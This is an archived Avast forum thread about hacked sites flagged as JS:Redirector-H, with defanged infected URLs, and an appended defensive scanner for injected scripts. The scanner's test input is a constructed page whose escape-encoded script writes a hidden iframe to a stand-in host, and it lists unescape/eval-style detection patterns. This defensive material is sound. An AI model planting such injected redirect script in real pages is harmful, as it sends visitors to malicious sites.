Author Topic: JS:Redirector-H [Trj] at website  (Read 35961 times)


stevecobb

  • Guest
JS:Redirector-H [Trj] at website
« on: April 29, 2009, 06:08:56 PM »
Avast gives me this Trojan warning @ hxxtp://www.gmdny.com which is a viable New York State contract website.
It appears only Avast picks this up...legitimacy please???
« Last Edit: April 29, 2009, 06:21:09 PM by stevecobb »

Offline Omid Farhang

  • Frontend Developer
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1660
  • I wish I could write longer personal text!!
    • Homepage
Re: JS:Redirector-H [Trj] at website
« Reply #1 on: April 29, 2009, 06:12:07 PM »
Hello and Welcome to the forum.

When you want to send a link to infected websites, please use this format: hXXp://www.infected-site.com/

Good Luck.
Twitter: OmidFarhangEn - OS: Manjaro KDE

stevecobb

  • Guest
Re: JS:Redirector-H [Trj] at website
« Reply #2 on: April 29, 2009, 06:17:58 PM »
OK... is hxxp://www.gmdny.com legitimately infected??

onlysomeone

  • Guest
Re: JS:Redirector-H [Trj] at website
« Reply #3 on: April 29, 2009, 06:19:45 PM »
I think what Omid meant was that you should modify your first post - make the link there unclickable...  ;)

Offline Omid Farhang

Re: JS:Redirector-H [Trj] at website
« Reply #4 on: April 29, 2009, 06:20:59 PM »
Well, I did not find anything wrong with this site; it looks clean.

stevecobb

  • Guest
Re: JS:Redirector-H [Trj] at website
« Reply #5 on: April 29, 2009, 06:23:16 PM »
Why am I getting the warning of JS:Redirector-H [trj] from Avast for the site then?

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88895
  • No support PMs thanks
Re: JS:Redirector-H [Trj] at website
« Reply #6 on: April 29, 2009, 06:30:27 PM »
The site has been hacked, there is a large chunk of obfuscated javascript just before the opening Body tag of that page, see image. I modified the code to make it easier to see in the image as it is on a single line.

avast is all over these injection infections like a rash.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Offline Omid Farhang

Re: JS:Redirector-H [Trj] at website
« Reply #7 on: April 29, 2009, 06:44:02 PM »
David, do you know a tool to make this script a little easier to read than it is now?  ???

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: JS:Redirector-H [Trj] at website
« Reply #8 on: April 29, 2009, 07:13:29 PM »
Hi stevecobb,

Here is information about this malware: http://www.microsoft.com/security/portal/Entry.aspx?Name=Trojan:JS/Redirector.H
In general about these SQL-injecting threats read: http://blogs.technet.com/antimalware/
A list of compromised sites you can find here:
http://www.shadowserver.org/wiki/

Sites that were infected with JS-redirector-H:
Approximate # of pages injected: ranging between 440,000 and 230

What to do?
Empty the temporary java cache. [Located in the java console].
Here are the instructions on how to manually remove these malicious applets from the JRE cache directory:

From the Start button, click Settings > Control Panel
In the Control Panel, open the "Java Plug-in Control Panel"
Select the Cache Tab
Click the Clear button inside the Cache Tab, which will clear your JRE cache directory
pictures: http://www.dslreports.com/forum/remark,13803204

To verify the current version of Java installed, use this tool: www.java.com/en/download/installed.jsp

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline Omid Farhang

Re: JS:Redirector-H [Trj] at website
« Reply #9 on: April 29, 2009, 07:24:33 PM »
Thanks for the info :)

Offline DavidR

Re: JS:Redirector-H [Trj] at website
« Reply #10 on: April 29, 2009, 08:14:37 PM »
I don't have a definitive script to check it; there is a site I use on occasion, http://www.felgall.com/javamet6.htm, when trying to look at unescape script like that above. However, there are frequent times when even that doesn't reveal the true intent. Alwil software have their own script checking tool so they are able to decode what the intent is (redirection, probably to a malicious site/script).

So suffice to say that javascript is a plain language scripting language, so when people go to these lengths to hide the purpose, that makes me very suspicious.

Offline Omid Farhang

Re: JS:Redirector-H [Trj] at website
« Reply #11 on: April 29, 2009, 08:20:04 PM »
Thanks David for the link, I appreciate it :)
I know about Alwil and their program to read those kinds of scripts.

FKonline

  • Guest
Re: JS:Redirector-H [Trj] at website
« Reply #12 on: April 29, 2009, 08:21:02 PM »
Another website where my avast alerts detecting such a JS:Redirector-H [trj]:
- hXXp://www.4allclients.de/?action=4&id=1894777&utm_source=GB_DE [+ blocked bad network (hXXp://gumblar.cn/rss/?id=5818702)]

Offline DavidR

Re: JS:Redirector-H [Trj] at website
« Reply #13 on: April 29, 2009, 08:55:46 PM »
Yes this is a fast growing exploit hacking legit sites and injecting either iframe or script tags into the page/s to redirect to a malicious site where the payload resides. The script responsible for the redirect is at the bottom of the page, see image1

There is also another alert on that site as the favicon.ico file has been replaced with an html page purporting to be a 404 error page redirecting also to a malicious site, image2 & 3.

So you should report it to the site owner/webmaster, etc.

Allex

  • Guest
Re: JS:Redirector-H [Trj] at website
« Reply #14 on: April 29, 2009, 10:12:06 PM »
Hello, this is my first post here.
I am the owner of a small website with a phpbb forum called hxxt://www.problemefiat.ro. The problem is I was hit by this JS:Redirector-H [trj] 3 days ago. So far I tried cleaning the php code...no result. Today I deleted my files from the hosting and copied over a back-up I made a while back. The site stayed clean for about 16 hours and now is infected again. Does anyone know how to protect your website from these types of attacks? Or do I need to restore my back-up every day? :(
Thanks!
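
Added example (not part of any post in this thread, and not Avast's or Alwil's own tooling): a static check a site owner can run over served files for the two things DavidR describes in replies #10 and #13, an escape-encoded script injected ahead of the `<body>` tag and a favicon.ico replaced by an HTML page. The function names, the threshold of 5 escapes and the sample page are assumptions made for illustration.

```javascript
// Added example: static triage only, nothing from the page is ever executed.
const SUSPECT = /\b(unescape|eval|fromCharCode|document\.write)\s*\(/g;

// Decode %XX and %uXXXX escapes the way unescape() would, without running any script.
function decodeEscapes(s) {
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Report <script> blocks that combine decode/write calls with heavy escape encoding.
function scanPage(html) {
  const m = /<body[\s>]/i.exec(html);
  const bodyAt = m ? m.index : html.length;
  const findings = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  for (let s; (s = re.exec(html)) !== null;) {
    const code = s[1];
    const calls = [...new Set((code.match(SUSPECT) || []).map(c => c.replace(/\s*\($/, '')))];
    const escapes = (code.match(/%u[0-9a-f]{4}|%[0-9a-f]{2}/gi) || []).length;
    if (calls.length === 0 || escapes < 5) continue; // assumed threshold
    const decoded = decodeEscapes(code);
    findings.push({
      offset: s.index,
      beforeBody: s.index < bodyAt, // injected ahead of the opening <body> tag
      calls, escapes,
      urls: decoded.match(/https?:\/\/[^\s"'<>)]+/gi) || [],
      hiddenIframe: /<iframe\b/i.test(decoded),
    });
  }
  return findings;
}

// A real .ico starts with bytes 00 00 01 00; an HTML page served in its place does not.
function faviconIsHtml(buf) {
  const isIco = buf.length >= 4 && buf.readUInt32LE(0) === 0x00010000;
  return !isIco && /<(html|script|iframe|meta)\b/i.test(buf.toString('latin1', 0, 2048));
}

// Constructed sample input (not taken from the sites named in this thread).
const SAMPLE_PAGE = "<html><head><title>t</title></head>\n" +
  "<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//redirect.example/in.php%22%20width%3D1%3E%3C/iframe%3E'))</script>\n" +
  "<body><script>var menu = 1;</script></body></html>";
const SAMPLE_FAVICON = Buffer.from("<html><head><title>404 Not Found</title></head></html>");

console.log(scanPage(SAMPLE_PAGE), faviconIsHtml(SAMPLE_FAVICON));
```

A finding only shows where the injected markup sits and what it decodes to; if it reappears after a restore, as in the last post, the way the attacker writes to the site is still open.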